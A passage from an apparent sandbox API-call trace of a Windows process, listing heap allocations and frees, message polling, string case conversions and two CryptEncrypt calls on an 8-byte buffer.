out: hHeap=0x2af0000) returned 1 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0212.780] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0212.780] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38549c8 | out: hHeap=0x2af0000) returned 1 [0212.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab728 [0212.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0212.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0212.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0212.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0212.781] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0212.781] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0212.781] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0212.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab3f8 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854d70 [0212.781] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0212.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0212.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0212.782] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0212.782] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0212.782] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0212.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0212.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0212.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.783] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854d70 | out: hHeap=0x2af0000) returned 1 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.783] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0212.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.784] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.784] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.784] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.784] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0212.784] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0212.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0212.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab4b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.787] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0212.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.787] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0212.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.787] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.787] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.787] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.787] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.788] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.788] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab470, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.788] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72718*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72718*, pdwDataLen=0x8cef60*=0x8) returned 1 [0212.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.788] PeekMessageW (in: lpMsg=0x8cf3b8, 